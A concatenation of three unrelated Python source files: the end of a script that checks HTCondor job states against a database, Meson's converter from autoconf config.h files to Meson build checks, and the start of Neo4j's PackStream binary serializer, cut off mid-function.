print "E: Job %d is marked as running in the db, but its condor submited job is marked as removed." % r.id
elif lines[0] == '4': # condor completed
print "E: Job %d is marked as running in the db, but its condor submited job is marked as completed." % r.id
elif lines[0] == '5': # condor held
print "E: Job %d is marked as running in the db, but its condor submited job is marked as held." % r.id
elif lines[0] == '6': # condor submission error
print "E: Job %d is marked as running in the db, but its condor submited job is marked as submission error(SHOULD not happen as if condor can't start the job, it don't select one in the db)." % r.id
else:
print "W: condor return a not understood answer to a query. We will try some euristic to determine if it is running. test command `%s`. stdout returned `%s`" % (cmd, lines)
# except KeyError:
# pass
info = (r.id,
r["jobman.experiment"],
r["jobman.sql.condor_slot"],
r["jobman.sql.host_name"],
r["jobman.sql.start_time"])
run_time = str_time(now - info[4])
if info[2] == "no_condor_slot":
print "W: Job %d is not running on condor(Should not happed...)" % info[0]
else:
p = Popen('''condor_status -constraint 'Name == "slot%s@%s"' -format "%%s" Name -format " %%s" State -format " %%s" Activity -format " %%s" RemoteUser -format " %%s\n" RemoteOwner''' % (info[2], info[3]),
shell=True, stdout=PIPE)
p.wait()
lines = p.stdout.readlines()
# return when running: slot1@brams0b.iro.umontreal.ca Claimed Busy bastienf bastienf
# return when don't exist: empty
if len(lines) == 0:
print "W: Job %d is running on a host(%s) that condor lost connection with. The job run for: %s" % (r.id, info[3], run_time)
continue
elif len(lines) != 1 and not (len(lines) == 2 and lines[-1] == '\n'):
print "W: Job %d condor_status return not understood: ", lines
continue
sp = lines[0].split()
if len(sp) >= 3 and sp[1] in ["Unclaimed", "Owner"] and sp[2] == "Idle":
print "E: Job %d db tell that this job is running on %s. condor tell that this host don't run a job. running time %s" % (r.id, info[3], run_time)
elif len(sp) == 5:
assert sp[0] == "slot%s@%s" % (info[2], info[3])
if sp[3] != sp[4]:
print "W: Job %d condor_status return not understood: ", lines
if sp[1] == "Claimed" and sp[2] in ["Busy", "Retiring"]:
if sp[4].split('@')[0] == os.getenv("USER"):
print "W: Job %d is running on a condor host that is running a job of the same user. running time: %s" % (r.id, run_time)
else:
print "E: Job %d is running on a condor host that is running a job for user %s. running time: %s" % (r.id, sp[4].split('@')[0], run_time)
else:
print "W: Job %d condor state of host not understood" % r.id, sp
else:
print "W: Job %d condor_status return not understood: ", lines
finally:
session.close()
runner_registry['check'] = (parse_check, check_serve)
|
|
#!/usr/bin/env python3
# Copyright 2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
help_message = """Usage: {} <config.h.meson>
This script reads config.h.meson, looks for header
checks and writes the corresponding meson declaration.
Copy config.h.in to config.h.meson, replace #undef
with #mesondefine and run this. We can't do this automatically
because some configure scripts have #undef statements
that are unrelated to configure checks.
"""
import sys
# Add stuff here as it is encountered.
function_data = \
{'HAVE_FEENABLEEXCEPT': ('feenableexcept', 'fenv.h'),
'HAVE_FECLEAREXCEPT': ('feclearexcept', 'fenv.h'),
'HAVE_FEDISABLEEXCEPT': ('fedisableexcept', 'fenv.h'),
'HAVE_MMAP': ('mmap', 'sys/mman.h'),
'HAVE_GETPAGESIZE': ('getpagesize', 'unistd.h'),
'HAVE_GETISAX': ('getisax', 'sys/auxv.h'),
'HAVE_GETTIMEOFDAY': ('gettimeofday', 'sys/time.h'),
'HAVE_MPROTECT': ('mprotect', 'sys/mman.h'),
'HAVE_POSIX_MEMALIGN': ('posix_memalign', 'stdlib.h'),
'HAVE_SIGACTION': ('sigaction', 'signal.h'),
'HAVE_ALARM': ('alarm', 'unistd.h'),
'HAVE_CTIME_R': ('ctime_r', 'time.h'),
'HAVE_DRAND48': ('drand48', 'stdlib.h'),
'HAVE_FLOCKFILE': ('flockfile', 'stdio.h'),
'HAVE_FORK': ('fork', 'unistd.h'),
'HAVE_FUNLOCKFILE': ('funlockfile', 'stdio.h'),
'HAVE_GETLINE': ('getline', 'stdio.h'),
'HAVE_LINK': ('link', 'unistd.h'),
'HAVE_RAISE': ('raise', 'signal.h'),
'HAVE_STRNDUP': ('strndup', 'string.h'),
'HAVE_SCHED_GETAFFINITY': ('sched_getaffinity', 'sched.h'),
'HAVE_WAITPID': ('waitpid', 'sys/wait.h'),
'HAVE_XRENDERCREATECONICALGRADIENT': ('XRenderCreateConicalGradient', 'xcb/render.h'),
'HAVE_XRENDERCREATELINEARGRADIENT': ('XRenderCreateLinearGradient', 'xcb/render.h'),
'HAVE_XRENDERCREATERADIALGRADIENT': ('XRenderCreateRadialGradient', 'xcb/render.h'),
'HAVE_XRENDERCREATESOLIDFILL': ('XRenderCreateSolidFill', 'xcb/render.h'),
'HAVE_DCGETTEXT': ('dcgettext', 'libintl.h'),
'HAVE_ENDMNTENT': ('endmntent', 'mntent.h'),
'HAVE_ENDSERVENT': ('endservent', 'netdb.h'),
'HAVE_EVENTFD': ('eventfd', 'sys/eventfd.h'),
'HAVE_FALLOCATE': ('fallocate', 'fcntl.h'),
'HAVE_FCHMOD': ('fchmod', 'sys/stat.h'),
'HAVE_FCHOWN': ('fchown', 'unistd.h'),
'HAVE_FDWALK': ('fdwalk', 'stdlib.h'),
'HAVE_FSYNC': ('fsync', 'unistd.h'),
'HAVE_GETC_UNLOCKED': ('getc_unlocked', 'stdio.h'),
'HAVE_GETFSSTAT': ('getfsstat', 'sys/mount.h'),
'HAVE_GETMNTENT_R': ('getmntent_r', 'mntent.h'),
'HAVE_GETPROTOBYNAME_R': ('getprotobyname_r', 'netdb.h'),
'HAVE_GETRESUID': ('getresuid', 'unistd.h'),
'HAVE_GETVFSSTAT': ('getvfsstat', 'sys/statvfs.h'),
'HAVE_GMTIME_R': ('gmtime_r', 'time.h'),
'HAVE_HASMNTOPT': ('hasmntopt', 'mntent.h'),
'HAVE_IF_INDEXTONAME': ('if_indextoname', 'net/if.h'),
'HAVE_IF_NAMETOINDEX': ('if_nametoindex', 'net/if.h'),
'HAVE_INOTIFY_INIT1': ('inotify_init1', 'sys/inotify.h'),
'HAVE_ISSETUGID': ('issetugid', 'unistd.h'),
'HAVE_KEVENT': ('kevent', 'sys/event.h'),
'HAVE_KQUEUE': ('kqueue', 'sys/event.h'),
'HAVE_LCHMOD': ('lchmod', 'sys/stat.h'),
'HAVE_LCHOWN': ('lchown', 'unistd.h'),
'HAVE_LSTAT': ('lstat', 'sys/stat.h'),
'HAVE_MEMCPY': ('memcpy', 'string.h'),
'HAVE_MEMALIGN': ('memalign', 'stdlib.h'),
'HAVE_MEMMEM': ('memmem', 'string.h'),
'HAVE_NEWLOCALE': ('newlocale', 'locale.h'),
'HAVE_PIPE2': ('pipe2', 'fcntl.h'),
'HAVE_POLL': ('poll', 'poll.h'),
'HAVE_PRLIMIT': ('prlimit', 'sys/resource.h'),
'HAVE_PTHREAD_ATTR_SETSTACKSIZE': ('pthread_attr_setstacksize', 'pthread.h'),
'HAVE_PTHREAD_CONDATTR_SETCLOCK': ('pthread_condattr_setclock', 'pthread.h'),
'HAVE_PTHREAD_COND_TIMEDWAIT_RELATIVE_NP': ('pthread_cond_timedwait_relative_np', 'pthread.h'),
'HAVE_READLINK': ('readlink', 'unistd.h'),
'HAVE_RES_INIT': ('res_init', 'resolv.h'),
'HAVE_SENDMMSG': ('sendmmsg', 'sys/socket.h'),
'HAVE_SOCKET': ('socket', 'sys/socket.h'),
'HAVE_GETENV': ('getenv', 'stdlib.h'),
'HAVE_SETENV': ('setenv', 'stdlib.h'),
'HAVE_PUTENV': ('putenv', 'stdlib.h'),
'HAVE_UNSETENV': ('unsetenv', 'stdlib.h'),
'HAVE_SETMNTENT': ('setmntent', 'mntent.h'),
'HAVE_SNPRINTF': ('snprintf', 'stdio.h'),
'HAVE_SPLICE': ('splice', 'fcntl.h'),
'HAVE_STATFS': ('statfs', 'mount.h'),
'HAVE_STATVFS': ('statvfs', 'sys/statvfs.h'),
'HAVE_STPCOPY': ('stpcopy', 'string.h'),
'HAVE_STRCASECMP': ('strcasecmp', 'strings.h'),
'HAVE_STRLCPY': ('strlcpy', 'string.h'),
'HAVE_STRNCASECMP': ('strncasecmp', 'strings.h'),
'HAVE_STRSIGNAL': ('strsignal', 'signal.h'),
'HAVE_STRTOD_L': ('strtod_l', 'stdlib.h'),
'HAVE_STRTOLL_L': ('strtoll_l', 'stdlib.h'),
'HAVE_STRTOULL_L': ('strtoull_l', 'stdlib.h'),
'HAVE_SYMLINK': ('symlink', 'unistd.h'),
'HAVE_SYSCTLBYNAME': ('sysctlbyname', 'sys/sysctl.h'),
'HAVE_TIMEGM': ('timegm', 'time.h'),
'HAVE_USELOCALE': ('uselocale', 'xlocale.h'),
'HAVE_UTIMES': ('utimes', 'sys/time.h'),
'HAVE_VALLOC': ('valloc', 'stdlib.h'),
'HAVE_VASPRINTF': ('vasprintf', 'stdio.h'),
'HAVE_VSNPRINTF': ('vsnprintf', 'stdio.h'),
'HAVE_BCOPY': ('bcopy', 'strings.h'),
'HAVE_STRERROR': ('strerror', 'string.h'),
'HAVE_MEMMOVE': ('memmove', 'string.h'),
'HAVE_STRTOIMAX': ('strtoimax', 'inttypes.h'),
'HAVE_STRTOLL': ('strtoll', 'stdlib.h'),
'HAVE_STRTOQ': ('strtoq', 'stdlib.h'),
'HAVE_ACCEPT4': ('accept4', 'sys/socket.h'),
'HAVE_CHMOD': ('chmod', 'sys/stat.h'),
'HAVE_CHOWN': ('chown', 'unistd.h'),
'HAVE_FSTAT': ('fstat', 'sys/stat.h'),
'HAVE_GETADDRINFO': ('getaddrinfo', 'netdb.h'),
'HAVE_GETGRGID_R': ('getgrgid_r', 'grp.h'),
'HAVE_GETGRNAM_R': ('getgrnam_r', 'grp.h'),
'HAVE_GETGROUPS': ('getgroups', 'grp.h'),
'HAVE_GETOPT_LONG': ('getopt_long', 'getopt.h'),
'HAVE_GETPWNAM_R': ('getpwnam', 'pwd.h'),
'HAVE_GETPWUID_R': ('getpwuid_r', 'pwd.h'),
'HAVE_GETUID': ('getuid', 'unistd.h'),
'HAVE_LRINTF': ('lrintf', 'math.h'),
'HAVE_DECL_ISNAN': ('isnan', 'math.h'),
'HAVE_DECL_ISINF': ('isinf', 'math.h'),
'HAVE_ROUND': ('round', 'math.h'),
'HAVE_NEARBYINT': ('nearbyint', 'math.h'),
'HAVE_RINT': ('rint', 'math.h'),
'HAVE_MKFIFO': ('mkfifo', 'sys/stat.h'),
'HAVE_MLOCK': ('mlock', 'sys/mman.h'),
'HAVE_NANOSLEEP': ('nanosleep', 'time.h'),
'HAVE_PIPE': ('pipe', 'unistd.h'),
'HAVE_PPOLL': ('ppoll', 'poll.h'),
'HAVE_REGEXEC': ('regexec', 'regex.h'),
'HAVE_SETEGID': ('setegid', 'unistd.h'),
'HAVE_SETEUID': ('seteuid', 'unistd.h'),
'HAVE_SETPGID': ('setpgid', 'unistd.h'),
'HAVE_SETREGID': ('setregid', 'unistd.h'),
'HAVE_SETRESGID': ('setresgid', 'unistd.h'),
'HAVE_SETRESUID': ('setresuid', 'unistd.h'),
'HAVE_SHM_OPEN': ('shm_open', 'fcntl.h'),
'HAVE_SLEEP': ('sleep', 'unistd.h'),
'HAVE_STRERROR_R': ('strerror_r', 'string.h'),
'HAVE_STRTOF': ('strtof', 'stdlib.h'),
'HAVE_SYSCONF': ('sysconf', 'unistd.h'),
'HAVE_USLEEP': ('usleep', 'unistd.h'),
'HAVE_VFORK': ('vfork', 'unistd.h'),
'HAVE_MALLOC': ('malloc', 'stdlib.h'),
'HAVE_CALLOC': ('calloc', 'stdlib.h'),
'HAVE_REALLOC': ('realloc', 'stdlib.h'),
'HAVE_FREE': ('free', 'stdlib.h'),
'HAVE_ALLOCA': ('alloca', 'alloca.h'),
'HAVE_QSORT': ('qsort', 'stdlib.h'),
'HAVE_ABS': ('abs', 'stdlib.h'),
'HAVE_MEMSET': ('memset', 'string.h'),
'HAVE_MEMCMP': ('memcmp', 'string.h'),
'HAVE_STRLEN': ('strlen', 'string.h'),
'HAVE_STRLCAT': ('strlcat', 'string.h'),
'HAVE_STRDUP': ('strdup', 'string.h'),
'HAVE__STRREV': ('_strrev', 'string.h'),
'HAVE__STRUPR': ('_strupr', 'string.h'),
'HAVE__STRLWR': ('_strlwr', 'string.h'),
'HAVE_INDEX': ('index', 'strings.h'),
'HAVE_RINDEX': ('rindex', 'strings.h'),
'HAVE_STRCHR': ('strchr', 'string.h'),
'HAVE_STRRCHR': ('strrchr', 'string.h'),
'HAVE_STRSTR': ('strstr', 'string.h'),
'HAVE_STRTOL': ('strtol', 'stdlib.h'),
'HAVE_STRTOUL': ('strtoul', 'stdlib.h'),
'HAVE_STRTOULL': ('strtoull', 'stdlib.h'),
'HAVE_STRTOD': ('strtod', 'stdlib.h'),
'HAVE_ATOI': ('atoi', 'stdlib.h'),
'HAVE_ATOF': ('atof', 'stdlib.h'),
'HAVE_STRCMP': ('strcmp', 'string.h'),
'HAVE_STRNCMP': ('strncmp', 'string.h'),
'HAVE_VSSCANF': ('vsscanf', 'stdio.h'),
'HAVE_CHROOT': ('chroot', 'unistd.h'),
'HAVE_CLOCK': ('clock', 'time.h'),
'HAVE_CLOCK_GETRES': ('clock_getres', 'time.h'),
'HAVE_CLOCK_GETTIME': ('clock_gettime', 'time.h'),
'HAVE_CLOCK_SETTIME': ('clock_settime', 'time.h'),
'HAVE_CONFSTR': ('confstr', 'time.h'),
'HAVE_CTERMID': ('ctermid', 'stdio.h'),
'HAVE_DIRFD': ('dirfd', 'dirent.h'),
'HAVE_DLOPEN': ('dlopen', 'dlfcn.h'),
'HAVE_DUP2': ('dup2', 'unistd.h'),
'HAVE_DUP3': ('dup3', 'unistd.h'),
'HAVE_EPOLL_CREATE1': ('epoll_create1', 'sys/epoll.h'),
'HAVE_ERF': ('erf', 'math.h'),
'HAVE_ERFC': ('erfc', 'math.h'),
'HAVE_EXECV': ('execv', 'unistd.h'),
'HAVE_FACCESSAT': ('faccessat', 'unistd.h'),
'HAVE_FCHDIR': ('fchdir', 'unistd.h'),
'HAVE_FCHMODAT': ('fchmodat', 'sys/stat.h'),
'HAVE_FDATASYNC': ('fdatasync', 'unistd.h'),
'HAVE_FDOPENDIR': ('fdopendir', 'dirent.h'),
'HAVE_FEXECVE': ('fexecve', 'unistd.h'),
'HAVE_FLOCK': ('flock', 'sys/file.h'),
'HAVE_FORKPTY': ('forkpty', 'pty.h'),
'HAVE_FPATHCONF': ('fpathconf', 'unistd.h'),
'HAVE_FSTATAT': ('fstatat', 'unistd.h'),
'HAVE_FSTATVFS': ('fstatvfs', 'sys/statvfs.h'),
'HAVE_FTELLO': ('ftello', 'stdio.h'),
'HAVE_FTIME': ('ftime', 'sys/timeb.h'),
'HAVE_FTRUNCATE': ('ftruncate', 'unistd.h'),
'HAVE_FUTIMENS': ('futimens', 'sys/stat.h'),
'HAVE_FUTIMES': ('futimes', 'sys/time.h'),
'HAVE_GAI_STRERROR': ('gai_strerror', 'netdb.h'),
'HAVE_GETGROUPLIST': ('getgrouplist', 'grp.h'),
'HAVE_GETHOSTBYNAME': ('gethostbyname', 'netdb.h'),
'HAVE_GETHOSTBYNAME_R': ('gethostbyname_r', 'netdb.h'),
'HAVE_GETITIMER': ('getitimer', 'sys/time.h'),
'HAVE_GETLOADAVG': ('getloadavg', 'stdlib.h'),
'HAVE_GETLOGIN': ('getlogin', 'unistd.h'),
'HAVE_GETNAMEINFO': ('getnameinfo', 'netdb.h'),
'HAVE_GETPEERNAME': ('getpeername', 'sys/socket.h'),
'HAVE_GETPGID': ('getpgid', 'unistd.h'),
'HAVE_GETPGRP': ('getpgrp', 'unistd.h'),
'HAVE_GETPID': ('getpid', 'unistd.h'),
'HAVE_GETPRIORITY': ('getpriority', 'sys/resource.h'),
'HAVE_GETPWENT': ('getpwent', 'pwd.h'),
'HAVE_GETRANDOM': ('getrandom', 'linux/random.h'),
'HAVE_GETRESGID': ('getresgid', 'unistd.h'),
'HAVE_GETSID': ('getsid', 'unistd.h'),
'HAVE_GETSPENT': ('getspent', 'shadow.h'),
'HAVE_GETSPNAM': ('getspnam', 'shadow.h'),
'HAVE_GETWD': ('getwd', 'unistd.h'),
'HAVE_HSTRERROR': ('hstrerror', 'netdb.h'),
'HAVE_HTOLE64': ('htole64', 'endian.h'),
'HAVE_IF_NAMEINDEX': ('if_nameindex', 'net/if.h'),
'HAVE_INET_ATON': ('inet_aton', 'arpa/inet.h'),
'HAVE_INET_PTON': ('inet_pton', 'arpa/inet.h'),
'HAVE_INITGROUPS': ('initgroups', 'grp.h'),
'HAVE_KILL': ('kill', 'signal.h'),
'HAVE_KILLPG': ('killpg', 'signal.h'),
'HAVE_LINKAT': ('linkat', 'unistd.h'),
'HAVE_LOCKF': ('lockf', 'unistd.h'),
'HAVE_LUTIMES': ('lutimes', 'sys/time.h'),
'HAVE_MAKEDEV': ('makedev', 'sys/sysmacros.h'),
'HAVE_MBRTOWC': ('mbrtowc', 'wchar.h'),
'HAVE_MEMRCHR': ('memrchr', 'string.h'),
'HAVE_MKDIRAT': ('mkdirat', 'sys/stat.h'),
'HAVE_MKFIFOAT': ('mkfifoat', 'sys/stat.h'),
'HAVE_MKNOD': ('mknod', 'unistd.h'),
'HAVE_MKNODAT': ('mknodat', 'unistd.h'),
'HAVE_MKTIME': ('mktime', 'unistd.h'),
'HAVE_MKREMAP': ('mkremap', 'sys/mman.h'),
'HAVE_NICE': ('nice', 'unistd.h'),
'HAVE_OPENAT': ('openat', 'fcntl.h'),
'HAVE_OPENPTY': ('openpty', 'pty.h'),
'HAVE_PATHCONF': ('pathconf', 'unistd.h'),
'HAVE_PAUSE': ('pause', 'unistd.h'),
'HAVE_PREAD': ('pread', 'unistd.h'),
'HAVE_PTHREAD_KILL': ('pthread_kill', 'signal.h'),
'HAVE_PTHREAD_SIGMASK': ('pthread_sigmask', 'signal.h'),
'HAVE_PWRITE': ('pwrite', 'unistd.h'),
'HAVE_READLINKAT': ('readlinkat', 'unistd.h'),
'HAVE_READV': ('readv', 'sys/uio.h'),
'HAVE_RENAMEAT': ('renamat', 'stdio.h'),
'HAVE_SCHED_GET_PRIORITY_MAX': ('sched_get_priority_max', 'sched.h'),
'HAVE_SCHED_RR_GET_INTERVAL': ('sched_rr_get_interval', 'sched.h'),
'HAVE_SCHED_SETAFFINITY': ('sched_setaffinity', 'sched.h'),
'HAVE_SCHED_SETPARAM': ('sched_setparam', 'sched.h'),
'HAVE_SCHED_SETSCHEDULER': ('sched_setscheduler', 'sched.h'),
'HAVE_SELECT': ('select', 'sys/select.h'),
'HAVE_SEM_GETVALUE': ('sem_getvalue', 'semaphore.h'),
'HAVE_SEM_OPEN': ('sem_open', 'semaphore.h'),
'HAVE_SEM_TIMEDWAIT': ('sem_timedwait', 'semaphore.h'),
'HAVE_SEM_UNLINK': ('sem_unlink', 'semaphore.h'),
'HAVE_SENDFILE': ('sendfile', 'sys/sendfile.h'),
'HAVE_SETGID': ('setgid', 'unistd.h'),
'HAVE_SETGROUPS': ('setgroups', 'grp.h'),
'HAVE_SETHOSTNAME': ('sethostname', 'unistd.h'),
'HAVE_SETITIMER': ('setitimer', 'sys/time.h'),
'HAVE_SETLOCALE': ('setlocale', 'locale.h'),
'HAVE_SETPGRP': ('setpgrp', 'unistd.h'),
'HAVE_SETPRIORITY': ('setpriority', 'sys/resource.h'),
'HAVE_SETREUID': ('setreuid', 'unistd.h'),
'HAVE_SETSID': ('setsid', 'unistd.h'),
'HAVE_SETUID': ('setuid', 'unistd.h'),
'HAVE_SETVBUF': ('setvbuf', 'unistd.h'),
'HAVE_SIGALTSTACK': ('sigaltstack', 'signal.h'),
'HAVE_SIGINTERRUPT': ('siginterrupt', 'signal.h'),
'HAVE_SIGPENDING': ('sigpending', 'signal.h'),
'HAVE_SIGRELSE': ('sigrelse', 'signal.h'),
'HAVE_SIGTIMEDWAIT': ('sigtimedwait', 'signal.h'),
'HAVE_SIGWAIT': ('sigwait', 'signal.h'),
'HAVE_SIGWAITINFO': ('sigwaitinfo', 'signal.h'),
'HAVE_SOCKETPAIR': ('socketpair', 'sys/socket.h'),
'HAVE_STRFTIME': ('strftime', 'time.h'),
'HAVE_SYMLINKAT': ('symlinkat', 'unistd.h'),
'HAVE_SYNC': ('sync', 'unistd.h'),
'HAVE_TCGETPGRP': ('tcgetpgrp', 'unistd.h'),
'HAVE_TCSETPGRP': ('tcsetpgrp', 'unistd.h'),
'HAVE_TEMPNAM': ('tempnam', 'stdio.h'),
'HAVE_TIMES': ('times', 'sys/times.h'),
'HAVE_TEMPFILE': ('tempfile', 'stdio.h'),
'HAVE_TMPNAM': ('tmpnam', 'stdio.h'),
'HAVE_TMPNAM_R': ('tmpnam_r', 'stdio.h'),
'HAVE_TRUNCATE': ('truncate', 'unistd.h'),
'HAVE_TZNAME': ('tzname', 'time.h'),
'HAVE_UNAME': ('uname', 'sys/utsname.h'),
'HAVE_UNLINKAT': ('unlinkat', 'unistd.h'),
'HAVE_UTIMENSAT': ('utimensat', 'sys/stat.h'),
'HAVE_WAIT3': ('wait3', 'sys/wait.h'),
'HAVE_WAIT4': ('wait4', 'sys/wait.h'),
'HAVE_WAITID': ('waitid', 'sys/wait.h'),
'HAVE_WRITEV': ('writev', 'sys/uio.h'),
'HAVE_WMEMCMP': ('wmemcmp', 'wchar.h'),
'HAVE_ATAN': ('atan', 'math.h'),
'HAVE_ATAN2': ('atan2', 'math.h'),
'HAVE_ACOS': ('acos', 'math.h'),
'HAVE_ACOSH': ('acosh', 'math.h'),
'HAVE_ASIN': ('asin', 'math.h'),
'HAVE_ASINH': ('asinh', 'math.h'),
'HAVE_ATANH': ('atanh', 'math.h'),
'HAVE_CEIL': ('ceil', 'math.h'),
'HAVE_COPYSIGN': ('copysign', 'math.h'),
'HAVE_COS': ('cos', 'math.h'),
'HAVE_COSH': ('cosh', 'math.h'),
'HAVE_COSF': ('cosf', 'math.h'),
'HAVE_EXPM1': ('expm1', 'math.h'),
'HAVE_FABS': ('fabs', 'math.h'),
'HAVE_FINITE': ('finite', 'math.h'),
'HAVE_FLOOR': ('floor', 'math.h'),
'HAVE_GAMMA': ('gamma', 'math.h'),
'HAVE_HYPOT': ('hypot', 'math.h'),
'HAVE_ISINF': ('isinf', 'math.h'),
'HAVE_LOG': ('log', 'math.h'),
'HAVE_LOG1P': ('log1p', 'math.h'),
'HAVE_LOG2': ('log2', 'math.h'),
'HAVE_LGAMMA': ('lgamma', 'math.h'),
'HAVE_POW': ('pow', 'math.h'),
'HAVE_SCALBN': ('scalbn', 'math.h'),
'HAVE_SIN': ('sin', 'math.h'),
'HAVE_SINF': ('sinf', 'math.h'),
'HAVE_SINH': ('sinh', 'math.h'),
'HAVE_SQRT': ('sqrt', 'math.h'),
'HAVE_TGAMMA': ('tgamma', 'math.h'),
'HAVE_FSEEKO': ('fseeko', 'stdio.h'),
'HAVE_FSEEKO64': ('fseeko64', 'stdio.h'),
'HAVE_SETJMP': ('setjmp', 'setjmp.h'),
'HAVE_PTHREAD_SETNAME_NP': ('pthread_setname_np', 'pthread.h'),
'HAVE_PTHREAD_SET_NAME_NP': ('pthread_set_name_np', 'pthread.h'),
}
headers = []
functions = []
sizes = []
if len(sys.argv) != 2:
print(help_message.format(sys.argv[0]))
sys.exit(0)
with open(sys.argv[1]) as f:
for line in f:
line = line.strip()
arr = line.split()
# Check for headers.
if line.startswith('#mesondefine') and line.endswith('_H'):
token = line.split()[1]
tarr = token.split('_')[1:-1]
tarr = [x.lower() for x in tarr]
hname = '/'.join(tarr) + '.h'
headers.append((token, hname))
# Check for functions.
try:
token = arr[1]
if token in function_data:
fdata = function_data[token]
functions.append([token, fdata[0], fdata[1]])
elif token.startswith('HAVE_') and not token.endswith('_H'):
functions.append([token])
except Exception:
pass
# Check for sizeof tests.
if len(arr) != 2:
continue
elem = arr[1]
if elem.startswith('SIZEOF_'):
typename = elem.split('_', 1)[1] \
.replace('_P', '*') \
.replace('_', ' ') \
.lower() \
.replace('size t', 'size_t')
sizes.append((elem, typename))
print('''cc = meson.get_compiler('c')
cdata = configuration_data()''')
# Convert header checks.
print('check_headers = [')
for token, hname in headers:
print(" ['{}', '{}'],".format(token, hname))
print(']\n')
print('''foreach h : check_headers
if cc.has_header(h.get(1))
cdata.set(h.get(0), 1)
endif
endforeach
''')
# Convert function checks.
print('check_functions = [')
for tok in functions:
if len(tok) == 3:
tokstr, fdata0, fdata1 = tok
print(" ['{}', '{}', '#include<{}>'],".format(tokstr, fdata0, fdata1))
else:
print('# check token', tok)
print(']\n')
print('''foreach f : check_functions
if cc.has_function(f.get(1), prefix : f.get(2))
cdata.set(f.get(0), 1)
endif
endforeach
''')
# Convert sizeof checks.
for elem, typename in sizes:
print("cdata.set('{}', cc.sizeof('{}'))".format(elem, typename))
print('''
configure_file(input : 'config.h.meson',
output : 'config.h',
configuration : cdata)''')
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) 2002-2019 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from codecs import decode
from io import BytesIO
from struct import pack as struct_pack, unpack as struct_unpack
PACKED_UINT_8 = [struct_pack(">B", value) for value in range(0x100)]
PACKED_UINT_16 = [struct_pack(">H", value) for value in range(0x10000)]
UNPACKED_UINT_8 = {bytes(bytearray([x])): x for x in range(0x100)}
UNPACKED_UINT_16 = {struct_pack(">H", x): x for x in range(0x10000)}
UNPACKED_MARKERS = {b"\xC0": None, b"\xC2": False, b"\xC3": True}
UNPACKED_MARKERS.update({bytes(bytearray([z])): z for z in range(0x00, 0x80)})
UNPACKED_MARKERS.update({bytes(bytearray([z + 256])): z for z in range(-0x10, 0x00)})
INT64_MIN = -(2 ** 63)
INT64_MAX = 2 ** 63
EndOfStream = object()
class Structure:
def __init__(self, tag, *fields):
self.tag = tag
self.fields = list(fields)
def __repr__(self):
return "Structure[0x%02X](%s)" % (ord(self.tag), ", ".join(map(repr, self.fields)))
def __eq__(self, other):
try:
return self.tag == other.tag and self.fields == other.fields
except AttributeError:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __len__(self):
return len(self.fields)
def __getitem__(self, key):
return self.fields[key]
def __setitem__(self, key, value):
self.fields[key] = value
class Packer:
def __init__(self, stream):
self.stream = stream
self._write = self.stream.write
def pack_raw(self, data):
self._write(data)
def pack(self, value):
return self._pack(value)
def _pack(self, value):
write = self._write
# None
if value is None:
write(b"\xC0") # NULL
# Boolean
elif value is True:
write(b"\xC3")
elif value is False:
write(b"\xC2")
# Float (only double precision is supported)
elif isinstance(value, float):
write(b"\xC1")
write(struct_pack(">d", value))
# Integer
elif isinstance(value, int):
if -0x10 <= value < 0x80:
write(PACKED_UINT_8[value % 0x100])
elif -0x80 <= value < -0x10:
write(b"\xC8")
write(PACKED_UINT_8[value % 0x100])
elif -0x8000 <= value < 0x8000:
write(b"\xC9")
write(PACKED_UINT_16[value % 0x10000])
elif -0x80000000 <= value < 0x80000000:
write(b"\xCA")
write(struct_pack(">i", value))
elif INT64_MIN <= value < INT64_MAX:
write(b"\xCB")
write(struct_pack(">q", value))
else:
raise OverflowError("Integer %s out of range" % value)
# String
elif isinstance(value, str):
encoded = value.encode("utf-8")
self.pack_string_header(len(encoded))
self.pack_raw(encoded)
# Bytes
elif isinstance(value, bytes):
self.pack_bytes_header(len(value))
self.pack_raw(value)
elif isinstance(value, bytearray):
self.pack_bytes_header(len(value))
self.pack_raw(bytes(value))
# List
elif isinstance(value, list):
self.pack_list_header(len(value))
for item in value:
self._pack(item)
# Map
elif isinstance(value, dict):
self.pack_map_header(len(value))
for key, item in value.items():
self._pack(key)
self._pack(item)
# Structure
elif isinstance(value, Structure):
self.pack_struct(value.tag, value.fields)
# Other
else:
raise ValueError("Values of type %s are not supported" % type(value))
def pack_bytes_header(self, size):
write = self._write
if size < 0x100:
write(b"\xCC")
write(PACKED_UINT_8[size])
elif size < 0x10000:
write(b"\xCD")
write(PACKED_UINT_16[size])
elif size < 0x100000000:
write(b"\xCE")
write(struct_pack(">I", size))
else:
raise OverflowError("Bytes header size out of range")
def pack_string_header(self, size):
write = self._write
if size == 0x00:
write(b"\x80")
elif size == 0x01:
write(b"\x81")
elif size == 0x02:
write(b"\x82")
elif size == 0x03:
write(b"\x83")
elif size == 0x04:
write(b"\x84")
elif size == 0x05:
write(b"\x85")
elif size == 0x06:
write(b"\x86")
elif size == 0x07:
write(b"\x87")
elif size == 0x08:
write(b"\x88")
elif size == 0x09:
write(b"\x89")
elif size == 0x0A:
write(b"\x8A")
elif size == 0x0B:
write(b"\x8B")
elif size == 0x0C:
write(b"\x8C")
elif size == 0x0D:
write(b"\x8D")
elif size == 0x0E:
write(b"\x8E")
elif size == 0x0F:
write(b"\x8F")
elif size < 0x100:
write(b"\xD0")
write(PACKED_UINT_8[size])
elif size < 0x10000:
write(b"\xD1")
write(PACKED_UINT_16[size])
elif size < 0x100000000:
write(b"\xD2")
write(struct_pack(">I", size))
else:
raise OverflowError("String header size out of range")
def pack_list_header(self, size):
write = self._write
if size == 0x00:
write(b"\x90")
elif size == 0x01:
write(b"\x91")
elif size == 0x02:
write(b"\x92")
